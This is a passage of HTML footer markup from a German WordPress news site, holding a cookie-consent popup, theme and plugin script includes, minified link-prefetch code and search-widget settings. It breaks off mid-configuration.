  2739. <style>.tdi_246{text-align:center!important;margin-right:auto;margin-left:auto}.tdi_246 .tdm-descr{color:#000000;font-family:Work Sans!important;font-size:14px!important;line-height:1.2!important;font-weight:300!important}.tdi_246 .tdm-descr a{color:#ec3535}.tdi_246 .tdm-descr a:hover{color:#c11f1f}@media (min-width:1019px) and (max-width:1140px){.tdi_246 .tdm-descr{font-size:11px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_246 .tdm-descr{font-size:11px!important}}@media (max-width:767px){.tdi_246 .tdm-descr{font-size:13px!important}}</style><p class="tdm-descr">© 2024 Nachrichten Morgen. Alle Rechte vorbehalten.
  2740.  
  2741. nachrichtenmorgen.de ist Teilnehmer des Amazon Services LLC Associates-Programms, einem Affiliate-Werbeprogramm, das Websites die Möglichkeit bietet, durch Werbung und Verlinkung zu Amazon.com Werbegebühren zu verdienen.</p></div></div></div></div></div></div></div></div></div></div></div>        </div>
  2742.  
  2743.    </div>
  2744.    <style>.tdc-footer-template .td-main-content-wrap{padding-bottom:0}</style>
  2745.  
  2746. </div><!--close td-outer-wrap-->
  2747.        <div class="wordpress-gdpr-popup wordpress-gdpr-popup-overlay wordpress-gdpr-popup-bottom"
  2748.            style="background-color: #F7F7F7; color: #333333;">
  2749.  
  2750.                            <div class="wordpress-gdpr-popup-overlay-backdrop"></div>
  2751.                <div class="wordpress-gdpr-popup-container" style="background-color: #F7F7F7; color: #333333;">
  2752.            
  2753.                
  2754.                <div class="wordpress-gdpr-popup-text">
  2755.                    <p>Wir verwenden Cookies, um Ihnen die beste Online-Erfahrung zu bieten. Mit Ihrer Zustimmung akzeptieren Sie die Verwendung von Cookies in Übereinstimmung mit unseren Cookie-Richtlinien.</p>
  2756.  
  2757.                                    </div>
  2758.                <div class="wordpress-gdpr-popup-actions">
  2759.                    <div class="wordpress-gdpr-popup-actions-buttons">
  2760.                                                    <a href="#" class="wordpress-gdpr-popup-agree" style="background-color: #000000; color: #FFFFFF;">Akzeptieren</a>
  2761.                                            
  2762.                                                    <a href="#" class="wordpress-gdpr-popup-preferences wordpress-gdpr-open-privacy-settings-modal" style="background-color: #777777; color: #FFFFFF;">Einstellungen</a>
  2763.                        
  2764.                                                <div class="gdpr-clear"></div>
  2765.                    </div>
  2766.                    
  2767.                    <div class="wordpress-gdpr-popup-actions-links">
  2768.                                                    <a href="https://nachrichtenmorgen.de/datenschutzbestimmungen/" class="wordpress-gdpr-popup-privacy-center" style="color: #FF5722;">Datenschutz-Center</a>
  2769.                        
  2770.                        
  2771.                                            </div>
  2772.  
  2773.                                    </div>
  2774.            </div>
  2775.        </div>
  2776.        
  2777.        <div class="wordpress-gdpr-privacy-settings-popup-container">
  2778.            <div class="wordpress-gdpr-privacy-settings-popup"
  2779.                style="background-color: #FFFFFF; color: #333333;">
  2780.                <a href="#" id="wordpress-gdpr-privacy-settings-popup-close" title="close" class="wordpress-gdpr-privacy-settings-popup-close" style="background-color: #000000;">
  2781.                    <i style="color: #FFFFFF;" class="fa fa-times"></i>
  2782.                </a>
  2783.                            </div>
  2784.            <div class="wordpress-gdpr-privacy-settings-popup-backdrop"></div>
  2785.        </div>
  2786.        
  2787.  
  2788.    <!--
  2789.  
  2790.        Theme: Newspaper by tagDiv.com 2023
  2791.        Version: 12.6.2 (rara)
  2792.        Deploy mode: deploy
  2793.        
  2794.        uid: 663a6987291a1
  2795.    -->
  2796.  
  2797.    <script type="text/javascript" id="wordpress-gdpr-public-js-extra">
  2798. /* <![CDATA[ */
  2799. var gdpr_options = {"ajaxURL":"https:\/\/nachrichtenmorgen.de\/wp-admin\/admin-ajax.php","cookieLifetime":"180","geoIP":"0","privacySettingsPopupBackdropDisableClick":"0","popupExcludePages":"","acceptanceText":"Sie m\u00fcssen unsere Datenschutzerkl\u00e4rung akzeptieren.","termsAcceptanceText":"You must accept our Terms and Conditions."};
  2800. /* ]]> */
  2801. </script>
  2802. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/wordpress-gdpr/public/js/wordpress-gdpr-public.js?ver=1712796473" id="wordpress-gdpr-public-js"></script>
  2803. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/plugins/ad-invalid-click-protector/assets/js/js.cookie.min.js?ver=3.0.0" id="js-cookie-js"></script>
  2804. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/plugins/ad-invalid-click-protector/assets/js/jquery.iframetracker.min.js?ver=2.1.0" id="js-iframe-tracker-js"></script>
  2805. <script type="text/javascript" id="aicp-js-extra">
  2806. /* <![CDATA[ */
  2807. var AICP = {"ajaxurl":"https:\/\/nachrichtenmorgen.de\/wp-admin\/admin-ajax.php","nonce":"7ce98bd459","ip":"114.119.158.126","clickLimit":"2","clickCounterCookieExp":"3","banDuration":"7","countryBlockCheck":"Yes","banCountryList":"PK,IN"};
  2808. /* ]]> */
  2809. </script>
  2810. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/plugins/ad-invalid-click-protector/assets/js/aicp.min.js?ver=1.0" id="aicp-js"></script>
  2811. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" id="rocket-browser-checker-js-after">
  2812. /* <![CDATA[ */
  2813. "use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();
  2814. /* ]]> */
  2815. </script>
  2816. <script type="text/javascript" id="rocket-preload-links-js-extra">
  2817. /* <![CDATA[ */
  2818. var RocketPreloadLinksConfig = {"excludeUris":"\/(?:.+\/)?feed(?:\/(?:.+\/?)?)?$|\/(?:.+\/)?embed\/|\/(index.php\/)?(.*)wp-json(\/.*|$)|\/refer\/|\/go\/|\/recommend\/|\/recommends\/","usesTrailingSlash":"1","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php|html|htm","siteUrl":"https:\/\/nachrichtenmorgen.de","onHoverDelay":"100","rateThrottle":"3"};
  2819. /* ]]> */
  2820. </script>
  2821. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" id="rocket-preload-links-js-after">
  2822. /* <![CDATA[ */
  2823. (function() {
  2824. "use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run();
  2825. }());
  2826. /* ]]> */
  2827. </script>
  2828. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=12.6.2" id="td-site-min-js"></script>
  2829. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdPostImages.js?ver=1712796473" id="tdPostImages-js"></script>
  2830. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdSocialSharing.js?ver=1712796473" id="tdSocialSharing-js"></script>
  2831. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdModalPostImages.js?ver=1712796473" id="tdModalPostImages-js"></script>
  2832. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-includes/js/comment-reply.min.js?ver=c8acece587b8aab92174ed546adf76db" id="comment-reply-js" async="async" data-wp-strategy="async"></script>
  2833. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-includes/js/underscore.min.js?ver=1.13.4" id="underscore-js"></script>
  2834. <script type="text/javascript" id="tds_js_files_for_front-js-extra">
  2835. /* <![CDATA[ */
  2836. var tds_js_globals = {"wpRestNonce":"88ab16cfd3","wpRestUrl":"https:\/\/nachrichtenmorgen.de\/wp-json\/","permalinkStructure":"\/%postname%\/"};
  2837. /* ]]> */
  2838. </script>
  2839. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/plugins/td-subscription/assets/js/js_files_for_front.min.js?ver=1.5.3" id="tds_js_files_for_front-js"></script>
  2840. <script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=34c58173fa732974ccb0ca4df5ede162" id="tdb_js_files_for_front-js"></script>
  2841.  
  2842.  
  2843. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdLoadingBox.js?ver=1712796473" id="tdLoadingBox-js"></script>
  2844.  
  2845. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdInfiniteLoader.js?ver=1712796473" id="tdInfiniteLoader-js"></script>
  2846.  
  2847. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-cloud-library/assets/js/tdbMenu.js?ver=1712796473" id="tdbMenu-js"></script>
  2848.  
  2849. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdLoginMobile.js?ver=1712796473" id="tdLoginMobile-js"></script>
  2850.  
  2851. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdAjaxSearch.js?ver=1712796473" id="tdDatei18n-js"></script>
  2852.  
  2853. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdPopupModal.js?ver=1712796473" id="tdPopupModal-js"></script>
  2854.  
  2855. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-cloud-library/assets/js/tdbSearch.js?ver=1712796473" id="tdbSearch-js"></script>
  2856.  
  2857. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdMenu.js?ver=1712796473" id="tdMenu-js"></script>
  2858.  
  2859. <script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://nachrichtenmorgen.de/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdSmartSidebar.js?ver=1712796473" id="tdSmartSidebar-js"></script>
  2860. <!-- JS generated by theme -->
  2861.  
  2862. <script type="rocketlazyloadscript">
  2863.    
  2864.  
  2865.            
  2866.                /* global jQuery:{} */
  2867.                jQuery(document).ready( function () {
  2868.  
  2869.                    var tdbMenuItem = new tdbMenu.item();
  2870.                    tdbMenuItem.blockUid = 'tdi_1';
  2871.                    tdbMenuItem.jqueryObj = jQuery('.tdi_1');
  2872.  
  2873.                
  2874.                    tdbMenuItem.isMegaMenuFull = true;
  2875.  
  2876.                
  2877.                
  2878.                    tdbMenuItem.megaMenuLoadType = 'preload';
  2879.  
  2880.                
  2881.                    tdbMenu.addItem(tdbMenuItem);
  2882.  
  2883.                });
  2884.            
  2885.            
  2886.  
  2887.            
  2888.                /* global jQuery:{} */
  2889.                jQuery(document).ready( function () {
  2890.  
  2891.                    var tdbMenuItem = new tdbMenu.item();
  2892.                    tdbMenuItem.blockUid = 'tdi_5';
  2893.                    tdbMenuItem.jqueryObj = jQuery('.tdi_5');
  2894.  
  2895.                
  2896.                    tdbMenuItem.isMegaMenuFull = true;
  2897.  
  2898.                
  2899.                
  2900.                    tdbMenuItem.megaMenuLoadType = 'preload';
  2901.  
  2902.                
  2903.                    tdbMenu.addItem(tdbMenuItem);
  2904.  
  2905.                });
  2906.            
  2907.            
  2908.  
  2909.                    
  2910.  
  2911.                        /* global jQuery:{} */
  2912.                        jQuery().ready( function () {
  2913.  
  2914.                            var blockUid = 'tdi_33',
  2915.                                $blockObj = jQuery('.tdi_33'),
  2916.                                modalUid = 'td_m_246d',
  2917.                                $modalObj = $blockObj.find('.tdm-popup-modal-wrap'),
  2918.                                show_modal_in_composer = 'yes';
  2919.  
  2920.                            if( $modalObj.length && modalUid !== '' ) {
  2921.                                var tdPopupModalItem = new tdPopupModal.item(),
  2922.                                    $triggerBtnObj = $blockObj.find('> .tds-button > a.tdm-btn');
  2923.  
  2924.                                // modal uid
  2925.                                tdPopupModalItem.uid = modalUid;
  2926.                                // block uid
  2927.                                tdPopupModalItem.blockUid = blockUid;
  2928.                                // modal object
  2929.                                tdPopupModalItem.modalObj = $modalObj;
  2930.                                // modal object
  2931.                                tdPopupModalItem.closeModals = [];
  2932.                                // modal open position
  2933.                                tdPopupModalItem._modal_open_position = 'over-screen';
  2934.                                // modal open disable site scroll
  2935.                                tdPopupModalItem._site_scroll = '1';
  2936.  
  2937.                                // check to see whether we are in composer or not
  2938.                                                                    // we are not in composer
  2939.  
  2940.                                    // trigger button object
  2941.                                    if( $triggerBtnObj.length ) {
  2942.                                        tdPopupModalItem.triggerBtnObj = $triggerBtnObj;
  2943.                                    }
  2944.  
  2945.                                    // trigger types
  2946.                                    tdPopupModalItem._modal_trigger_types = {"button":[]};
  2947.  
  2948.                                    // modal content load
  2949.                                    tdPopupModalItem._modal_content_load = '';
  2950.  
  2951.                                    
  2952.                                
  2953.                                tdPopupModal.addItem(tdPopupModalItem);
  2954.  
  2955.                            }
  2956.  
  2957.                        });
  2958.  
  2959.                    
  2960.                    
  2961.  
  2962.        
  2963.            jQuery().ready(function () {
  2964.  
  2965.                var tdbSearchItem = new tdbSearch.item();
  2966.  
  2967.                //block unique ID
  2968.                tdbSearchItem.blockUid = 'tdi_51';
  2969.                tdbSearchItem.blockAtts = '{"form_align":"content-horiz-left","results_msg_align":"content-horiz-center","image_floated":"float_left","image_width":"30","image_size":"td_324x400","show_cat":"","show_btn":"none","show_date":"","show_review":"none","show_com":"none","show_excerpt":"none","show_author":"none","meta_padding":"eyJhbGwiOiIwIDAgMCAxMnB4IiwicG9ydHJhaXQiOiIwIDAgMCAxMHB4IiwibGFuZHNjYXBlIjoiMCAwIDAgMTBweCJ9","art_title":"eyJwaG9uZSI6IjAiLCJhbGwiOiIwIDAgMTBweCAwIiwibGFuZHNjYXBlIjoiMCAwIDZweCAwIiwicG9ydHJhaXQiOiIwIDAgNHB4IDAifQ==","all_modules_space":"eyJhbGwiOiIyMCIsInBvcnRyYWl0IjoiMTUiLCJsYW5kc2NhcGUiOiIxNSJ9","icon_padding":"eyJhbGwiOjIsInBvcnRyYWl0IjoiMS42In0=","icon_size":"eyJhbGwiOiIxNyIsInBvcnRyYWl0IjoiMTUifQ==","all_underline_color":"","tdc_css":"eyJhbGwiOnsiZGlzcGxheSI6ImlubGluZS1ibG9jayJ9LCJsYW5kc2NhcGUiOnsiZGlzcGxheSI6ImlubGluZS1ibG9jayJ9LCJsYW5kc2NhcGVfbWF4X3dpZHRoIjoxMTQwLCJsYW5kc2NhcGVfbWluX3dpZHRoIjoxMDE5LCJwb3J0cmFpdCI6eyJkaXNwbGF5IjoiaW5saW5lLWJsb2NrIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3Njh9","toggle_horiz_align":"content-horiz-left","results_msg_padding":"eyJwb3J0cmFpdCI6IjdweCJ9","results_limit":"6","modules_gap":"20","form_width":"eyJhbGwiOiI5MDAiLCJsYW5kc2NhcGUiOiI4MDAiLCJwb3J0cmFpdCI6IjcwMCJ9","form_offset_left":"eyJhbGwiOiItOTYiLCJsYW5kc2NhcGUiOiItOTIiLCJwb3J0cmFpdCI6Ii03NCJ9","results_padding":"eyJhbGwiOiIyNXB4IDIwcHgiLCJwb3J0cmFpdCI6IjIwcHggMjBweCJ9","btn_bg":"#ec3535","btn_bg_h":"#000000","btn_color_h":"#ffffff","f_results_msg_font_style":"normal","f_results_msg_font_family":"653","f_results_msg_font_size":"12","f_results_msg_font_transform":"uppercase","results_msg_color":"#ec3535","results_msg_color_h":"#000000","f_title_font_family":"456","f_title_font_size":"eyJhbGwiOiIxNSIsInBvcnRyYWl0IjoiMTEiLCJwaG9uZSI6IjIwIiwibGFuZHNjYXBlIjoiMTQifQ==","f_title_font_line_height":"1.2","form_shadow_shadow_size":"16","form_shadow_shadow_offset_vertical":"2","form_shadow_shadow_color":"rgba(0,0,0,0.09)","f_input_font_family":"653","f_input_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTMifQ==","f_placeholder_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTMifQ==","f_placeholder_font_family":"653","arrow_color":"#ffffff","title_txt":"#000000","title_txt_hover":"#ec3535","f_toggle_txt_font_line_height":"3","tdicon":"td-icon-magnifier-big-rounded","f_toggle_txt_font_family":"653","f_toggle_txt_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTMifQ==","toggle_txt_pos":"","toggle_txt_color":"#000000","f_toggle_txt_font_weight":"600","show_form":"yes","form_align_screen":"","placeholder_travel":"13","f_title_font_weight":"600","meta_info_align":"center","results_border":"0","form_border":"0","f_results_msg_font_weight":"600","icon_color":"#000000","icon_color_h":"#ec3535","toggle_txt_color_h":"#ec3535","modules_on_row":"50%","mc1_tl":"15","btn_icon_size":"eyJwb3J0cmFpdCI6IjEwIn0=","modules_category_padding":"3px 0","modules_category_margin":"eyJhbGwiOiIwIDVweCAwIDAiLCJwb3J0cmFpdCI6IjAgM3B4IDAgMCJ9","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","cat_txt":"#ec3535","cat_txt_hover":"#000000","f_cat_font_family":"653","f_cat_font_transform":"uppercase","f_meta_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTEifQ==","f_meta_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTEifQ==","f_cat_font_line_height":"1","f_meta_font_line_height":"1","toggle_txt":"Suchen","block_type":"tdb_header_search","post_type":"","disable_trigger":"","show_results":"yes","separator":"","disable_live_search":"","exclude_pages":"","exclude_posts":"","search_section_header":"","results_section_1_title":"","results_section_1_taxonomies":"","results_section_1_level":"","results_section_2_title":"","results_section_2_taxonomies":"","results_section_2_level":"","results_section_3_title":"","results_section_3_taxonomies":"","results_section_3_level":"","results_section_search_query_terms":"","results_section_search_query_terms_title":"","results_section_search_query_terms_taxonomies":"","sec_title_space":"","sec_title_color":"","tax_space":"","tax_title_color":"","tax_title_color_h":"","f_sec_title_font_header":"","f_sec_title_font_title":"Section title text","f_sec_title_font_settings":"","f_sec_title_font_family":"","f_sec_title_font_size":"","f_sec_title_font_line_height":"","f_sec_title_font_style":"","f_sec_title_font_weight":"","f_sec_title_font_transform":"","f_sec_title_font_spacing":"","f_sec_title_":"","f_tax_title_font_title":"Taxonomy title text","f_tax_title_font_settings":"","f_tax_title_font_family":"","f_tax_title_font_size":"","f_tax_title_font_line_height":"","f_tax_title_font_style":"","f_tax_title_font_weight":"","f_tax_title_font_transform":"","f_tax_title_font_spacing":"","f_tax_title_":"","toggle_txt_align":"0","toggle_txt_space":"","inline":"","float_block":"","form_offset":"","form_content_width":"","form_padding":"","input_placeholder":"","input_padding":"","input_border":"","input_radius":"","btn_text":"Search","btn_tdicon":"","btn_icon_pos":"","btn_icon_space":"","btn_icon_align":"0","btn_margin":"","btn_padding":"","btn_border":"","btn_radius":"","results_msg_border":"","mc1_title_tag":"","mc1_el":"","open_in_new_window":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_height":"","image_radius":"","hide_image":"","video_icon":"","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","vid_t_color":"","vid_t_bg_color":"","f_vid_time_font_header":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","excl_margin":"","excl_padd":"","all_excl_border":"","all_excl_border_style":"solid","excl_radius":"","excl_color":"","excl_color_h":"","excl_bg":"","excl_bg_h":"","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_family":"","f_excl_font_size":"","f_excl_font_line_height":"","f_excl_font_style":"","f_excl_font_weight":"","f_excl_font_transform":"","f_excl_font_spacing":"","f_excl_":"","meta_info_horiz":"content-horiz-left","meta_width":"","meta_margin":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","art_btn":"","modules_category":"","modules_cat_border":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_space":"","review_size":"2.5","review_distance":"","art_excerpt":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","btn_title":"","btn_border_width":"","form_general_bg":"","f_toggle_txt_font_header":"","f_toggle_txt_font_title":"Text","f_toggle_txt_font_settings":"","f_toggle_txt_font_style":"","f_toggle_txt_font_transform":"","f_toggle_txt_font_spacing":"","f_toggle_txt_":"","form_bg":"","form_border_color":"","form_shadow_shadow_header":"","form_shadow_shadow_title":"Shadow","form_shadow_shadow_offset_horizontal":"","form_shadow_shadow_spread":"","input_color":"","placeholder_color":"","placeholder_opacity":"0","input_bg":"","input_border_color":"","input_shadow_shadow_header":"","input_shadow_shadow_title":"Input shadow","input_shadow_shadow_size":"","input_shadow_shadow_offset_horizontal":"","input_shadow_shadow_offset_vertical":"","input_shadow_shadow_spread":"","input_shadow_shadow_color":"","btn_color":"","btn_icon_color":"","btn_icon_color_h":"","btn_border_color":"","btn_border_color_h":"","btn_shadow_shadow_header":"","btn_shadow_shadow_title":"Button shadow","btn_shadow_shadow_size":"","btn_shadow_shadow_offset_horizontal":"","btn_shadow_shadow_offset_vertical":"","btn_shadow_shadow_spread":"","btn_shadow_shadow_color":"","f_input_font_header":"","f_input_font_title":"Input text","f_input_font_settings":"","f_input_font_line_height":"","f_input_font_style":"","f_input_font_weight":"","f_input_font_transform":"","f_input_font_spacing":"","f_input_":"","f_placeholder_font_title":"Placeholder text","f_placeholder_font_settings":"","f_placeholder_font_line_height":"","f_placeholder_font_style":"","f_placeholder_font_weight":"","f_placeholder_font_transform":"","f_placeholder_font_spacing":"","f_placeholder_":"","f_btn_font_title":"Button text","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","results_bg":"","results_border_color":"","results_msg_bg":"","results_msg_border_color":"","f_results_msg_font_header":"","f_results_msg_font_title":"Text","f_results_msg_font_settings":"","f_results_msg_font_line_height":"","f_results_msg_font_spacing":"","f_results_msg_":"","m_bg":"","color_overlay":"","shadow_module_shadow_header":"","shadow_module_shadow_title":"Module Shadow","shadow_module_shadow_size":"","shadow_module_shadow_offset_horizontal":"","shadow_module_shadow_offset_vertical":"","shadow_module_shadow_spread":"","shadow_module_shadow_color":"","all_underline_height":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","shadow_meta_shadow_header":"","shadow_meta_shadow_title":"Meta info shadow","shadow_meta_shadow_size":"","shadow_meta_shadow_offset_horizontal":"","shadow_meta_shadow_offset_vertical":"","shadow_meta_shadow_spread":"","shadow_meta_shadow_color":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border_hover":"","f_title_font_header":"","f_title_font_title":"Article 